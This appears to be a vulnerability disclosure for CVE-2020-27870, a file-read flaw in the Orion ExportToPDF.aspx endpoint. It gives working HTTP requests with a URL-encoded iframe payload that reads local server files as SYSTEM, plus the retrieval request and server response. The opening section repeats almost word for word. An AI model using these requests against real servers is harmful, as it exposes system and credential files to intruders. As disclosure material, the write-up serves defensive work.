**CVE-2020-27870: Directory Traversal leading to arbitrary file read** The endpoint `/orion/ExportToPDF.aspx` converts HTML to PDF, but it fails to check if the HTML contains references to local files. Furthermore, the guest user account can access this endpoint. By supplying HTML files that contain references to local files, it is possible to read arbitrary files on the server in the context of SYSTEM. For example, the following request can be used to retrieve the contents of `C:\Windows\system32\drivers\etc\hosts`: ``` POST /orion/ExportToPDF.aspx?ExportID=55475&PageHTML=%3Chtml%3E%3Ciframe%20src=%22C:%5CWindows%5Csystem32%5Cdrivers%5Cetc%5Chosts%22%20width=%221000%22%20height=%221000%22%3E%3C/html%3E HTTP/1.1. <------- Host: 172.16.11.168:8787 User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Origin: http://172.16.11.168:8787 X-Requested-With: XMLHttpRequest Referer: http://172.16.11.168:8787/Orion/SummaryView.aspx?ViewID=1 Content-Type:...
**CVE-2020-27870: Directory Traversal leading to arbitrary file read** The endpoint `/orion/ExportToPDF.aspx` converts HTML to PDF, but it fails to check if the HTML contains references to local files. Furthermore, the guest user account can access this endpoint. By supplying HTML files that contain references to local files, it is possible to read arbitrary files on the server in the context of SYSTEM. For example, the following request can be used to retrieve the contents of `C:\Windows\system32\drivers\etc\hosts`: ``` POST /orion/ExportToPDF.aspx?ExportID=55475&PageHTML=%3Chtml%3E%3Ciframe%20src=%22C:%5CWindows%5Csystem32%5Cdrivers%5Cetc%5Chosts%22%20width=%221000%22%20height=%221000%22%3E%3C/html%3E HTTP/1.1. <------- Host: 172.16.11.168:8787 User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Origin: http://172.16.11.168:8787 X-Requested-With: XMLHttpRequest Referer: http://172.16.11.168:8787/Orion/SummaryView.aspx?ViewID=1 Content-Type: application/x-www-form-urlencoded Cookie: .ASPXAUTH=0660567401DF21BAAC59[...] Content-Length: 53 [...Truncated...] ``` A PDF contains the disclosed file contents can be retrieved as follows: ``` POST /orion/ExportToPDF.aspx?ExportID=55475&gimmethefile=true HTTP/1.1 Host: 172.16.11.168:8787 User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Origin: http://172.16.11.168:8787 X-Requested-With: XMLHttpRequest Referer: http://172.16.11.168:8787/Orion/SummaryView.aspx?ViewID=1 Content-Type: application/x-www-form-urlencoded Cookie: .ASPXAUTH=0660567401DF21BAAC590375C511332186FE319751464EE2932BBBCECF1EECFDEB7AA7233D83572D3B253C5ADE83A083BD5CF9E0B7699DFEDB363A1442CCF2EBE56CA101813AEF9FF9A1579E73A430AC3244F36FD16490759B5B68A4E8A3F5A81E11FC7C5089CDD107A332701E673486A9683E74BB72A823C438FB681E3821F71F74C58A4D2E10146E19B04D5D491E3799E0973FBF1A8ED1723E97FE52E40D29D926C3A0B88074EE68B1ECE4391CD320; ASP.NET_SessionId=4q4kij1u0b3p3w5fcztorv5e; XSRF-TOKEN=6/SttzXoY2rJFY+74my5pSS055DftLCVbuOBlNKBxEU=; __AntiXsrfToken=e2de2272ca1e4cb7854602e9a0ca8d03 Content-Length: 53 __AntiXsrfTokenInput=e2de2272ca1e4cb7854602e9a0ca8d03 HTTP/1.1 200 OK Cache-Control: private Transfer-Encoding: chunked Content-Type: binary/octet-stream Content-Disposition: attachment; filename="OrionReport.PDF"; size=32215 X-Same-Domain: 1 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Date: Wed, 07 Oct 2020 18:24:56 GMT 7dd7 %PDF-1.4 %.... 1 0 obj << /Creator (EO.Pdf) /Producer (EO.Pdf 19.2.11.0) /CreationDate (D:20201007182359+00'00') /ModDate (D:20201007182359+00'00') >> endobj [...Truncated...] ```
